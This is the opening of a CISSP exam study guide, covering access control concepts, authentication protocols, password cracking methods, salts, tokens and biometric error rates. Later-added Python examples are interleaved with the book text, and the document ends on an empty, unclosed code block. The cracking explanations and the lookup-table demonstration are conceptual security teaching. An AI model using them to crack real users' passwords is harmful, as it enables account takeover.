
Study Guide

SECOND EDITION
Eric Conrad
Seth Misenar
Joshua Feldman
TECHNICAL EDITOR
Kevin Riggins

Table of Contents
Cover image
Title page
Copyright
Author biography
Chapter 1. Domain 1: Access Control
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 2. Domain 2: Telecommunications and Network Security
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 3. Domain 3: Information Security Governance and Risk Management
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 4. Domain 4: Software Development Security
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 5. Domain 5: Cryptography
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 6. Domain 6: Security Architecture and Design
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 7. Domain 7: Operations Security
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 8. Domain 8: Business Continuity and Disaster Recovery Planning
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 9. Domain 9: Legal, Regulations, Investigations, and Compliance
Abstract
Exam Objectives in This Chapter
Introduction
Summary of exam objectives
Chapter 10. Domain 10: Physical (Environmental) Security
Abstract
Exam Objectives in This Chapter
Introduction
Summary of Exam Objectives
Index

Copyright
Acquiring Editor: Chris Katsaropoulos
Editorial Project Manager: Benjamin Rearick
Project Manager: Mohana Natarajan
Designer: Alan Studholme
Syngress is an imprint of Elsevier
225 Wyman Street, Waltham, MA 02451, USA
Second edition 2014
Copyright 2014, 2011 Elsevier Inc. All rights reserved.
No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means electronic, mechanical, photocopying, recording or otherwise without the prior written permission of the publisher.
Permissions may be sought directly from Elsevier's Science & Technology Rights Department in Oxford, UK: phone (+44) (0) 1865 843830; fax (+44) (0) 1865 853333; email: permissions@elsevier.com. Alternatively you can submit your request online by visiting the Elsevier website at http://elsevier.com/locate/permissions, and selecting Obtaining permission to use Elsevier material.

Notice

No responsibility is assumed by the publisher for any injury and/or damage to persons or property as a matter of products liability, negligence or otherwise, or from any use or operation of any methods, products, instructions or ideas contained in the material herein. Because of rapid advances in the medical sciences, in particular, independent verification of diagnoses and drug dosages should be made.

Library of Congress Cataloging-in-Publication Data
Application Submitted
British Library Cataloguing-in-Publication Data
A catalogue record for this book is available from the British Library
For information on all Syngress publications, visit our website at store.elsevier.com/syngress
ISBN: 978-0-12-417142-8
Printed and bound in USA
14 15 16 17 18 10 9 8 7 6 5 4 3 2 1

Author biography

Seth Misenar (CISSP, GIAC GSE, CompTIA CASP, GPEN, GCIH, GCIA, GCFA, GWAPT, GCWN, GSEC, MCSE, and MCDBA) is a Certified Instructor with the SANS Institute and coauthor of the SANS SEC528: SANS Training Program for the CompTIA Advanced Security Practitioner (CASP) Certification. Seth also serves as lead consultant for Jackson, Mississippi-based Context Security. Seth's background includes security research, network and Web application penetration testing, vulnerability assessment, regulatory compliance efforts, security architecture design, and general security consulting. He has previously served as a physical and network security consultant for Fortune 100 companies as well as the HIPAA and information security officer for a state government agency. Seth teaches a variety of courses for the SANS Institute, including Security Essentials, Advanced Web Application Penetration Testing, Hacker Techniques, and the CISSP and CASP courses.

Seth is pursuing a Master of Science degree in information security engineering from the SANS Technology Institute and holds a Bachelor of Science degree from Millsaps College. Seth resides in Jackson, Mississippi, with his family, Rachel, Jude, and Hazel.

Eric Conrad (CISSP, GIAC GSE, GPEN, GCIH, GCIA, GCFA, GAWN, GSEC, GISP, CompTIA CASP, and Security+) is a partner with Backshore Communications, which provides information warfare, penetration testing, incident handling, and intrusion detection consulting services. He is also a Certified Instructor with the SANS Institute and coauthor of SANS Security 528: SANS Training Program for the CompTIA Advanced Security Practitioner (CASP) Certification.

Eric's professional career began in 1991 as a UNIX systems administrator for a small oceanographic communications company. He gained information security experience in a variety of industries, including research, education, power, Internet, and healthcare, in roles ranging from systems programmer to security engineer to HIPAA security officer and ISSO. He has taught thousands of students in courses including SANS Management 414: CISSP, Security 560: Network Penetration Testing and Ethical Hacking, Security 504: Hacker Techniques, Exploits and Incident Handling, and others.

Eric is a graduate of the SANS Technology Institute with a Master of Science degree in information security engineering. Eric currently lives in Peaks Island, Maine, with his family, Melissa, Eric, and Emma.

Joshua Feldman (CISSP, NSA IAM) has supported the Department of Defense Information Systems Agency (DISA), as a contractor working for SAIC, Inc., since 2002. He is a subject matter expert and training developer for DISA's cyber security mission. During his tenure, he has contributed to the DoD 8500 series, specifically conducting research and authoring sections of the DoD 8570.01-M, also known as the DoD IA Workforce Improvement Program. He is the program manager for DISA's Computer Network Defense training initiative (entitled RaD-X) and has instructed well over 1000 students. He also is a subject matter expert for the Web-based Information Assurance awareness training every DoD user is required to take each year as part of their security awareness curriculum. He is a regular presenter and panel member at the Information Assurance Symposium, hosted by both DISA and NSA.

Before joining the support team at DoD/DISA, Joshua spent time as an IT Sec engineer working for the Department of State, Diplomatic Security. There, he traveled to embassies worldwide to conduct Tiger Team assessments of the security of each embassy. Joshua got his start in the IT Security field when he left his position teaching science for Montgomery County Public Schools, Maryland, and went to work for NFR Security Software. At the time, NFR was one of the leading companies producing Network Intrusion Detection systems.

CHAPTER 1

Domain 1: Access Control

Abstract
Access Control, the topic of this chapter and Domain 1 of the CISSP, presents numerous critically important terms and concepts that permeate several domains. This chapter introduces the CIA triad of confidentiality, integrity, and availability, which are touched upon in virtually every domain and chapter. In addition to CIA, concepts such as the principle of least privilege and need to know are presented. The application of these principles in the form of access control models such as Mandatory Access Control (MAC), Discretionary Access Control (DAC), and Role-Based Access Control (RBAC) represents a significant amount of this domain's material. Understanding the key categories of access control defenses (preventive, detective, corrective, recovery, deterrent, and compensating controls) is necessary for this and numerous other domains. The final major content area in this chapter deals with authentication, introducing methods, protocols, and concepts related to ensuring an identity claim can be validated appropriately.

KEYWORDS
Confidentiality; Integrity; Availability; Identification; Authentication; Authorization; Accountability; Subject; Object; Discretionary Access Control (DAC); Mandatory Access Control (MAC); Role-Based Access Control (RBAC); False Reject Rate (FRR); False Accept Rate (FAR); Crossover Error Rate (CER)

Exam Objectives in This Chapter

Cornerstone Access Control Concepts
Access Control Models
Access Control Defensive Categories and Types
Authentication Methods
Access Control Technologies
Assessing Access Control

Introduction
The purpose of access control is to allow authorized users access to appropriate data and deny access to unauthorized users. Access controls protect against threats such as unauthorized access, inappropriate modification of data, and loss of confidentiality.

CORNERSTONE INFORMATION SECURITY CONCEPTS

Before we can explain access control, we must define cornerstone information security concepts. These concepts provide the foundation upon which the 10 domains of the Common Body of Knowledge are built.

Confidentiality, integrity, and availability

Confidentiality, Integrity, and Availability are the CIA triad, the cornerstone concept of information security. The triad, shown in Figure 1.1, forms the three-legged stool information security is built upon. The order of the acronym may change (some prefer AIC, perhaps to avoid association with a certain intelligence agency), but the concepts are essential. This book will use the CIA acronym.

FIGURE 1.1 The CIA triad.

Confidentiality

Confidentiality seeks to prevent the unauthorized disclosure of information: it keeps data secret. In other words, confidentiality seeks to prevent unauthorized read access to data. An example of a confidentiality attack would be the theft of Personally Identifiable Information (PII), such as credit card information.

Integrity

Integrity seeks to prevent unauthorized modification of information. In other words, integrity seeks to prevent unauthorized write access to data.

Crunch Time
There are two types of integrity: data integrity and system integrity. Data integrity seeks to protect information against unauthorized modification; system integrity seeks to protect a system, such as a Windows 2012 server operating system, from unauthorized modification.

Availability

Availability ensures that information is available when needed. Systems need to be usable (available) for normal business use. An example of an attack on availability would be a Denial of Service (DoS) attack, which seeks to deny service (or availability) of a system.

Disclosure, alteration, and destruction

The CIA triad may also be described by its opposite: Disclosure, Alteration, and Destruction (DAD). Disclosure is the unauthorized disclosure of information; alteration is the unauthorized modification of data; and destruction is making systems unavailable. While the CIA acronym sometimes changes, the DAD acronym is shown in that order.
Identity and authentication, authorization, and accountability

The term AAA is often used, describing the cornerstone concepts Authentication, Authorization, and Accountability. Left out of the AAA acronym is Identification, which is required before the three As can follow.

Identity and authentication

Identity is a claim: if your name is Person X, you identify yourself by saying "I am Person X." Identity alone is weak because there is no proof. You can also identify yourself by saying "I am Person Y." Proving an identity claim is called authentication: you authenticate the identity claim, usually by supplying a piece of information or an object that only you possess, such as a password or your passport.

Authorization

Authorization describes the actions you can perform on a system once you have identified and authenticated. Actions may include reading, writing, or executing files or programs.

Accountability

Accountability holds users accountable for their actions. This is typically accomplished by logging and analyzing audit data. Enforcing accountability helps keep honest people honest. For some users, knowing that data is logged is not enough to provide accountability: they must know that the data is logged and audited, and that sanctions may result from violation of policy.

Nonrepudiation

Nonrepudiation means a user cannot deny (repudiate) having performed a transaction. It combines authentication and integrity: nonrepudiation authenticates the identity of a user who performs a transaction and ensures the integrity of that transaction. You must have both authentication and integrity to have nonrepudiation: proving you signed a contract to buy a car (authenticating your identity as the purchaser) is not useful if the car dealer can change the price from $20,000 to $40,000 (violating the integrity of the contract).

Least privilege and need to know

Least privilege means users should be granted the minimum amount of access (authorization) required to do their jobs, but no more. Least privilege is applied to groups of objects. Need to know is more granular than least privilege: the user must need to know that specific piece of information before accessing it.

Subjects and objects

A subject is an active entity on a data system. Most examples of subjects involve people accessing data files. However, running computer programs are subjects as well.

An object is any passive data within the system. Objects can range from databases to text files. The important thing to remember about objects is that they are passive within the system. They do not manipulate other objects.

Defense-in-depth

Defense-in-depth (also called layered defenses) applies multiple safeguards (also called controls: measures taken to reduce risk) to protect an asset. Any single security control may fail; by deploying multiple controls, you improve the confidentiality, integrity, and availability of your data.

ACCESS CONTROL MODELS

Now that we have reviewed the cornerstone access control concepts, we can discuss the different access control models: the primary models are Discretionary Access Control (DAC), Mandatory Access Control (MAC), and nondiscretionary access control.

Discretionary access controls

Discretionary Access Control (DAC) gives subjects full control of objects they have been given access to, including sharing the objects with other subjects. Subjects are empowered and control their data. Standard UNIX and Windows operating systems use DAC for file systems: subjects can grant other subjects access to their files, change their attributes, alter them, or delete them.

Mandatory access controls

Mandatory Access Control (MAC) is system-enforced access control based on a subject's clearance and an object's labels. Subjects and objects have clearances and labels, respectively, such as confidential, secret, and top secret. A subject may access an object only if the subject's clearance is equal to or greater than the object's label. Subjects cannot share objects with other subjects who lack the proper clearance or write down objects to a lower classification level (such as from top secret to secret). MAC systems are usually focused on preserving the confidentiality of data.
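The MAC rules above as a decision function (an added example, not code from the book): reads require clearance at or above the label, writes may not move data down a level, and an object may be shared only with a subject cleared for its label. The level names and the Subject/Object records are constructed for this example.

```python
"""Added example: a minimal Mandatory Access Control (MAC) decision function.

Rules taken from the text:
  read  - the subject's clearance must be equal to or greater than the label
  write - no write down: a subject may not write an object whose label is
          below its clearance (combined with the access rule, writes land
          on objects at the subject's own level)
  share - the recipient must hold a clearance for the object's label
The classification levels below are constructed for the example.
"""
from dataclasses import dataclass

# Ordered lattice of classification levels, lowest first (constructed).
LEVELS = ["unclassified", "confidential", "secret", "top secret"]
RANK = {name: i for i, name in enumerate(LEVELS)}


@dataclass(frozen=True)
class Subject:
    name: str
    clearance: str


@dataclass(frozen=True)
class Object:
    name: str
    label: str


def mac_permits(subject, obj, action, recipient=None):
    """Return True only if the system-enforced policy allows the action.

    Unknown levels and unknown actions are denied rather than guessed at:
    a MAC system fails closed.
    """
    if subject.clearance not in RANK or obj.label not in RANK:
        return False
    s, o = RANK[subject.clearance], RANK[obj.label]

    if action == "read":
        # "Equal to or greater than" the object's label: no read up.
        return s >= o
    if action == "write":
        # Access rule (s >= o) plus no write down (o >= s): writes at own level.
        return s >= o and o >= s
    if action == "share":
        # The sharer must be able to access the object, and the recipient
        # must hold a clearance for the label; DAC-style sharing is not allowed.
        if recipient is None or recipient.clearance not in RANK:
            return False
        return s >= o and RANK[recipient.clearance] >= o
    return False


def access_matrix(subjects, objects, action):
    """Table of (subject, object) -> decision, handy for reviewing a policy."""
    return {(su.name, ob.name): mac_permits(su, ob, action)
            for su in subjects for ob in objects}
```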
Nondiscretionary access control

Role-Based Access Control (RBAC) defines how information is accessed on a system based on the role of the subject. A role could be a nurse, a backup administrator, a help desk technician, etc. Subjects are grouped into roles and each defined role has access permissions based upon the role, not the individual.

RBAC is a type of nondiscretionary access control because users do not have discretion regarding the groups of objects they are allowed to access and are unable to transfer objects to other subjects.

Task-based access control is another nondiscretionary access control model, related to RBAC. Task-based access control is based on the tasks each subject must perform, such as writing prescriptions, restoring data from a backup tape, or opening a help desk ticket. It attempts to solve the same problem that RBAC solves, focusing on specific tasks instead of roles.

Rule-based access controls

A rule-based access control system uses a series of defined rules, restrictions, and filters for accessing objects within a system. The rules are in the form of if/then statements. An example of a rule-based access control device is a proxy firewall that allows users to surf the Web with predefined approved content only ("If the user is authorized to surf the Web and the site is on the approved list, then allow access"). Other sites are prohibited and this rule is enforced across all authenticated users.

Centralized access control

Centralized access control concentrates access control in one logical point for a system or organization. Instead of using local access control databases, systems authenticate via third-party authentication servers. Centralized access control can be used to provide Single Sign-On (SSO), where a subject may authenticate once, and then access multiple systems. Centralized access control can centrally provide the three As of access control: Authentication, Authorization, and Accountability.
Access control lists

Access control lists (ACLs) are used throughout many IT security policies, procedures, and technologies. An access control list is a list of objects; each entry describes the subjects that may access that object. Any access attempt by a subject to an object that does not have a matching entry on the ACL will be denied.

Access provisioning lifecycle

Once the proper access control model has been chosen and deployed, the access provisioning lifecycle must be maintained and secured. While many organizations follow best practices for issuing access, many lack formal processes for ensuring the entire lifetime of access is kept secure as employees and contractors move within an organization.

IBM describes the following identity lifecycle rules:
• Password policy compliance checking
• Notifying users to change their passwords before they expire
• Identifying lifecycle changes such as accounts that are inactive for more than 30 consecutive days
• Identifying new accounts that have not been used for more than 10 days following their creation
• Identifying accounts that are candidates for deletion because they have been suspended for more than 30 days
• When a contract expires, identifying all accounts belonging to a business partner or contractor's employees and revoking their access rights

User entitlement, access review, and audit

Access aggregation occurs as individual users gain more access to more systems. This can happen intentionally, as a function of Single Sign-On (SSO). It can also happen unintentionally: users often gain new entitlements (also called access rights) as they take on new roles or duties. This can result in authorization creep: users gain more entitlements without shedding the old ones. The power of these entitlements can compound over time, defeating controls such as least privilege and separation of duties. User entitlements must be routinely reviewed and audited. Processes should be developed that reduce or eliminate old entitlements as new ones are granted.

Access control protocols and frameworks

Both centralized and decentralized models may support remote users authenticating to local systems. A number of protocols and frameworks may be used to support this need, including RADIUS, Diameter, TACACS/TACACS+, PAP, and CHAP.
RADIUS

The Remote Authentication Dial In User Service (RADIUS) protocol is a third-party authentication system. RADIUS uses the User Datagram Protocol (UDP) ports 1812 (authentication) and 1813 (accounting).

RADIUS is considered an AAA system, comprised of three components: authentication, authorization, and accounting. It authenticates a subject's credentials against an authentication database. It authorizes users by allowing specific users access to specific data objects. It accounts for each data session by creating a log entry for each RADIUS connection made.

Diameter

Diameter is RADIUS's successor, designed to provide an improved Authentication, Authorization, and Accounting (AAA) framework. RADIUS provides limited accountability and has problems with flexibility, scalability, reliability, and security. Diameter is more flexible, allowing support for mobile remote users, for example.

TACACS and TACACS+

The Terminal Access Controller Access Control System (TACACS) is a centralized access control system that requires users to send an ID and static (reusable) password for authentication. TACACS uses UDP port 49 (and may also use TCP). Reusable passwords are a security vulnerability; the improved TACACS+ provides better password protection by allowing two-factor strong authentication.

TACACS+ is not backward compatible with TACACS. TACACS+ uses TCP port 49 for authentication with the TACACS+ server.
PAP and CHAP

The Password Authentication Protocol (PAP) is insecure: a user enters a password and it is sent across the network in clear text. When received by the PAP server, it is authenticated and validated. Sniffing the network may disclose the plaintext passwords.

The Challenge Handshake Authentication Protocol (CHAP) provides protection against playback attacks. It uses a central location that challenges remote users. As stated in RFC 1994, CHAP depends upon a secret known only to the authenticator and the peer. The secret is not sent over the link. Although the authentication is only one-way, by negotiating CHAP in both directions the same secret set may easily be used for mutual authentication.
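The CHAP exchange described above with both sides modelled, as an added example that is not part of the book: the authenticator issues a fresh challenge, the peer answers with the RFC 1994 MD5 response over (Identifier, secret, Challenge), and a captured response cannot be replayed. The shared secret and the challenge length are constructed for this example.

```python
"""Added example: a CHAP (RFC 1994) challenge/response exchange.

Shows the security properties the text describes: the secret never crosses
the link, and a replayed response fails because each challenge is fresh and
is consumed when answered.  The shared secret is a constructed value.
"""
import hashlib
import hmac
import os

SECRET = b"constructed-shared-secret"  # known only to authenticator and peer


def chap_response(identifier, secret, challenge):
    """RFC 1994 MD5 response: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """The central location that challenges remote peers."""

    def __init__(self, secret):
        self._secret = secret
        self._identifier = 0
        self._outstanding = {}  # identifier -> challenge awaiting a response

    def challenge(self, nbytes=16):
        """Issue a new random challenge; the identifier ties the reply to it."""
        self._identifier = (self._identifier + 1) % 256
        chal = os.urandom(nbytes)
        self._outstanding[self._identifier] = chal
        return self._identifier, chal

    def verify(self, identifier, response):
        """Accept the response only for an unanswered challenge we issued."""
        chal = self._outstanding.pop(identifier, None)
        if chal is None:
            return False  # unknown or already-used challenge: a replay fails here
        expected = chap_response(identifier, self._secret, chal)
        return hmac.compare_digest(expected, response)


class Peer:
    """The remote user's side: proves knowledge of the secret without sending it."""

    def __init__(self, secret):
        self._secret = secret

    def respond(self, identifier, challenge):
        return chap_response(identifier, self._secret, challenge)


def run_exchange(authenticator, peer):
    """One complete CHAP round; returns the on-the-wire values and the verdict."""
    identifier, challenge = authenticator.challenge()   # Challenge packet
    response = peer.respond(identifier, challenge)      # Response packet
    accepted = authenticator.verify(identifier, response)  # Success/Failure
    return identifier, challenge, response, accepted
```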

ACCESS CONTROL DEFENSIVE CATEGORIES AND TYPES

In order to understand and appropriately implement access controls, understanding what benefits each control can add to security is vital. In this section, each type of access control will be defined on the basis of how it adds to the security of the system.

There are six access control types:
• Preventive
• Detective
• Corrective
• Recovery
• Deterrent
• Compensating

Fast Facts
These access control types can fall into one of three categories: administrative, technical, or physical.
1. Administrative (also called directive) controls are implemented by creating and following organizational policy, procedure, or regulation. User training and awareness also fall into this category.
2. Technical controls are implemented using software, hardware, or firmware that restricts logical access on an information technology system. Examples include firewalls, routers, and encryption.
3. Physical controls are implemented with physical devices, such as locks, fences, gates, and security guards.

Preventive

Preventive controls prevent actions from occurring. They apply restrictions to what a potential user, either authorized or unauthorized, can do. An example of an administrative preventive control is a pre-employment drug screening. It is designed to prevent an organization from hiring an employee who is using illegal drugs.

Detective

Detective controls are controls that alert during or after a successful attack. Intrusion detection systems alerting after a successful attack, closed circuit television cameras (CCTV) that alert guards to an intruder, and a building alarm system that is triggered by an intruder are all examples of detective controls.

Corrective

Corrective controls work by correcting a damaged system or process. The corrective access control typically works hand in hand with detective access controls. Antivirus software has both components. First, the antivirus software runs a scan and uses its definition file to detect whether there is any software that matches its virus list. If it detects a virus, the corrective controls take over, place the suspicious software in quarantine, or delete it from the system.

Recovery

After a security incident has occurred, recovery controls may need to be taken in order to restore functionality of the system and organization. Recovery means that the system must be recovered: reinstalled from OS media or image, data restored from backups, etc.

Deterrent

Deterrent controls deter users from performing actions on a system. Examples include a "beware of dog" sign: a thief facing two buildings, one with guard dogs and one without, is more likely to attack the building without guard dogs. A large fine for speeding is a deterrent for drivers to not speed. A sanction policy that makes users understand that they will be fired if they are caught surfing illicit or illegal Web sites is a deterrent.

Compensating

A compensating control is an additional security control put in place to compensate for weaknesses in other controls.

AUTHENTICATION METHODS

A key concept for implementing any type of access control is controlling the proper authentication of subjects within the IT system. A subject first identifies himself or herself; this identification cannot be trusted. The subject then authenticates by providing an assurance that the claimed identity is valid. A credential set is the term used for the combination of both the identification and authentication of a user.

Did You Know?
There are three basic authentication methods: Type 1 (something you know), Type 2 (something you have), and Type 3 (something you are). A fourth type of authentication is someplace you are.

Strong authentication (also called multifactor authentication) requires that the user present more than one authentication factor. For example, a user may possess an ATM card in order to withdraw money out of the bank, but he/she must also input the correct PIN.
Type 1 authentication: something you know

Type 1 authentication (something you know) requires testing the subject with some sort of challenge and response where the subject must respond with a knowledgeable answer. The subject is granted access on the basis of something they know, such as a password or PIN (Personal Identification Number, a number-based password). This is the easiest, and often weakest, form of authentication.

Passwords

Passwords have been the cornerstone for access control to IT systems. They are relatively easy and cheap to implement. Many online banking, stock portfolio services, private Web mail, and healthcare systems still use a user name and password as the access control method.

There are four types of passwords to consider when implementing access controls: static passwords, passphrases, one-time passwords, and dynamic passwords.
• Static passwords are reusable passwords that may or may not expire. They are typically user generated and work best when combined with another authentication type, such as a smart card or biometric control.
• Passphrases are long static passwords, comprised of words in a phrase or sentence. An example of a passphrase is: "I will pass the CISSP in 6 months!" Passphrases may be made stronger by using nonsense words (replacing "CISSP" with "XYZZY" in the previous passphrase, for example), by mixing case, and by using additional numbers and symbols.
• One-time passwords may be used for a single authentication. They are very secure but difficult to manage. A one-time password is impossible to reuse and is valid for just one-time use.
• Dynamic passwords change at regular intervals. RSA Security makes a synchronous token device called SecurID that generates a new token code every 60 seconds. The user combines their static PIN with the RSA dynamic token code to create one dynamic password that changes every time it is used. One drawback when using dynamic passwords is the expense of the tokens themselves.
Password hashes and password cracking

In most cases, clear text passwords are not stored within an IT system; only the hashed outputs of those passwords are stored. Hashing is one-way encryption using an algorithm and no key. When a user attempts to log in, the password they type is hashed, and that hash is compared against the hash stored on the system. The hash function cannot be reversed: it is impossible to reverse the algorithm and produce a password from a hash. While hashes may not be reversed, an attacker may run the hash algorithm forward many times, selecting various possible passwords and comparing the output to a desired hash, hoping to find a match (and to derive the original password). This is called password cracking.

Dictionary attacks

A dictionary attack uses a word list: a predefined list of words, and then runs each word through a hash algorithm. If the cracking software matches the output from the dictionary attack output to the password hash, the attacker will be able to identify the original password.

Hybrid attacks

A hybrid attack appends, prepends, or changes characters in words from a dictionary before hashing, to attempt the fastest crack of complex passwords. For example, an attacker may have a dictionary of potential system administrator passwords but also replaces each letter "o" with the number "0".

Brute-force attacks

Brute-force attacks take more time but are more effective. The attacker calculates the hash outputs for every possible password. Just a few years ago, basic computer speed was still slow enough to make this a daunting task. However, with the advances in CPU speeds and parallel computing, the time required to brute force complex passwords has been considerably reduced.

Rainbow tables

A rainbow table is a precomputed compilation of plaintexts and matching ciphertexts (typically passwords and their matching hashes). Rainbow tables greatly speed up many types of password cracking attacks, often taking minutes to crack where other methods (such as dictionary, hybrid, and brute-force password cracking attempts) may take much longer.

Though rainbow tables act as a database, they are more complex under the hood, relying on a time/memory trade-off to represent and recover passwords and hashes. Most rainbow tables can crack most, but not all, possible hashes.

Salts

A salt allows one password to hash multiple ways. Some systems (like modern UNIX/Linux systems) combine a salt with a password before hashing: "The designers of the UNIX operating system improved on this method by using a random value called a salt. A salt value ensures that the same password will encrypt differently when used by different users. This method offers the advantage that an attacker must encrypt the same word multiple times (once for each salt or user) in order to mount a successful password guessing attack."

This makes rainbow tables far less effective (if not completely ineffective) for systems using salts. Instead of compiling one rainbow table for a system that does not use salts (such as Microsoft LAN Manager hashes), thousands, millions, billions, or more rainbow tables would be required for systems using salts, depending on the salt length.
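The effect of a salt on precomputed tables, as an added example that is not from the book: a small hash-to-plaintext table built from a constructed word list recovers an unsalted hash in one lookup, the same table is useless against a salted record, and a verifier still checks a salted login with a single hash. SHA-256 stands in for whatever hash a given system uses; the word list, passwords and salt size are constructed.

```python
"""Added example: salted versus unsalted password hashing against a
precomputed table.  The word list and passwords are constructed; SHA-256 is
used only to keep the demonstration short (real systems use a deliberately
slow password hash, but the salt argument is the same).
"""
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "qwerty", "summer2014", "dragon"]  # constructed


def hash_unsalted(password):
    """How a system without salts stores a password: hash(password)."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_salted(password, salt):
    """Salt is mixed into the input, so identical passwords hash differently per user."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_table(words):
    """Precomputed hash -> plaintext table; this is the role a rainbow table plays."""
    return {hash_unsalted(w): w for w in words}


def lookup(table, digest):
    """Recover the plaintext for a stored hash, or None if the table has no entry."""
    return table.get(digest)


def make_record(password, salt_bytes=16):
    """What a salted system stores for a user: (salt, hash), never the plaintext."""
    salt = os.urandom(salt_bytes)
    return salt, hash_salted(password, salt)


def verify(record, attempt):
    """Login check: hash the attempt with the stored salt and compare in constant time."""
    salt, stored = record
    return hmac.compare_digest(stored, hash_salted(attempt, salt))


def table_entries_with_salt(word_count, salt_bits):
    """Entries a precomputed table needs to cover the same words for every
    possible salt: one copy of the word list per salt value."""
    return word_count * (2 ** salt_bits)
```

With a 128-bit salt the last function shows why the text speaks of "billions, or more" tables: the word list would have to be hashed once per salt value.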
Type 2 authentication: something you have

Type 2 authentication (something you have) requires that users possess something, such as a token, which proves they are an authenticated user. A token is an object that helps prove an identity claim.

Synchronous dynamic token

Synchronous dynamic tokens use time or counters to synchronize a displayed token code with the code expected by the authentication server: the codes are synchronized.

Time-based synchronous dynamic tokens display dynamic token codes that change frequently, such as every 60 seconds. The dynamic code is only good during that window. The authentication server knows the serial number of each authorized token, the user it is associated with, and the time. It can predict the dynamic code on each token using these three pieces of information.

Counter-based synchronous dynamic tokens use a simple counter: the authentication server expects token code 1, and the user's token displays the same token. Once used, the token displays the second token, and the server also expects token #2.
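Both synchronous token styles above as working code, an added example that is not from the book: token and server share a seed, the counter-based pair stays in step (with a small look-ahead window for button presses that were never submitted), and the time-based variant derives its counter from 60-second windows. The book describes the tokens conceptually; the HMAC-SHA1 construction used here is the one from RFC 4226 (HOTP) and RFC 6238 (TOTP), and the shared seed is a constructed value.

```python
"""Added example: counter-based and time-based synchronous dynamic tokens.

Construction follows RFC 4226 / RFC 6238 (HMAC-SHA1 over an 8-byte counter,
dynamically truncated to 6 digits); this is an assumption for the example,
not a statement about any particular vendor's token.  SEED is constructed.
"""
import hashlib
import hmac
import struct

SEED = b"constructed-token-seed-1234567890"  # shared at enrollment by token and server


def hotp(seed, counter, digits=6):
    """RFC 4226 code: HMAC-SHA1(seed, counter) -> dynamic truncation -> decimal digits."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(seed, now, step=60, digits=6):
    """Time-based variant: the counter is the number of `step`-second windows so far."""
    return hotp(seed, int(now // step), digits)


class CounterToken:
    """Token side of a counter-based synchronous token: each press shows the next code."""

    def __init__(self, seed):
        self.seed = seed
        self.counter = 0

    def press(self):
        code = hotp(self.seed, self.counter)
        self.counter += 1
        return code


class CounterServer:
    """Server side: expects the next counter value, tolerating a small look-ahead
    so that codes the user displayed but never submitted do not lock them out."""

    def __init__(self, seed, window=3):
        self.seed = seed
        self.counter = 0
        self.window = window

    def verify(self, code):
        for c in range(self.counter, self.counter + self.window):
            if hmac.compare_digest(hotp(self.seed, c), code):
                self.counter = c + 1  # resynchronise and consume this code
                return True
        return False


def time_server_verify(seed, code, now, step=60, skew=1):
    """Time-based server check: accept the current window and `skew` windows on
    either side to absorb clock drift between token and server."""
    window = int(now // step)
    return any(hmac.compare_digest(hotp(seed, w), code)
               for w in range(window - skew, window + skew + 1))
```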
Asynchronous dynamic token

Asynchronous dynamic tokens are not synchronized with a central server. The most common variety is challenge-response tokens. Challenge-response token authentication systems produce a challenge or input for the token device. Then the user manually enters the information into the device along with their PIN, and the device produces an output. This output is then sent to the system.

Type 3 authentication: something you are

Type 3 authentication (something you are) is biometrics, which uses physical characteristics as a means of identification or authentication. Biometrics may be used to establish an identity or to authenticate (prove an identity claim). For example, an airport facial recognition system may be used to establish the identity of a known terrorist, and a fingerprint scanner may be used to authenticate the identity of a subject (who makes the identity claim and then swipes his or her finger to prove it).

Biometric enrollment and throughput

Enrollment describes the process of registering with a biometric system: creating an account for the first time. Users typically provide their username (identity), a password or PIN, and then provide biometric information, such as swiping fingerprints on a fingerprint reader or having a photograph taken of their irises. Enrollment is a one-time process that should take 2 minutes or less.

Throughput describes the process of authenticating to a biometric system. This is also called the biometric system response time. A typical throughput is 6-10 seconds.
Accuracy of biometric systems

The accuracy of biometric systems should be considered before implementing a biometric control program. Three metrics are used to judge biometric accuracy: the False Reject Rate (FRR), the False Accept Rate (FAR), and the Crossover Error Rate (CER).

False reject rate

A false rejection occurs when an authorized subject is rejected by the biometric system as unauthorized. False rejections are also called a Type I error. False rejections cause frustration of the authorized users, reduction in work due to poor access conditions, and expenditure of resources to revalidate authorized users.

False accept rate

A false acceptance occurs when an unauthorized subject is accepted as valid. If an organization's biometric control is producing a lot of false rejections, the overall control might have to lower the accuracy of the system by lessening the amount of data it collects when authenticating subjects. When the data points are lowered, the organization risks an increase in the false acceptance rate. The organization risks an unauthorized user gaining access. This type of error is also called a Type II error.

Crunch Time
A false accept is worse than a false reject: most organizations would prefer to reject authentic subjects rather than accept impostors. FARs (Type II errors) are worse than FRRs (Type I errors). Two is greater than one, which will help you remember that FAR is Type II, which is worse than Type I (FRRs).

Crossover Error Rate

The Crossover Error Rate (CER) describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal. CER is also known as the Equal Error Rate (EER). The Crossover Error Rate describes the overall accuracy of a biometric system.

As the sensitivity of a biometric system increases, FRRs will rise and FARs will drop. Conversely, as the sensitivity is lowered, FRRs will drop and FARs will rise. Figure 1.2 shows a graph depicting the FAR versus the FRR. The CER is the intersection of both lines of the graph as shown in Figure 1.2, based on the ISACA Biometric Auditing Guide, G36.

FIGURE 1.2 Crossover error rate.
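Locating the CER on measured FAR/FRR curves, as an added example that is not from the book: given error rates sampled at several sensitivity settings (constructed values, rising FRR and falling FAR as the text describes), the function finds where the two curves cross, interpolating between samples when no setting hits equality exactly, and a second helper picks the loosest setting that still keeps FAR under a ceiling.

```python
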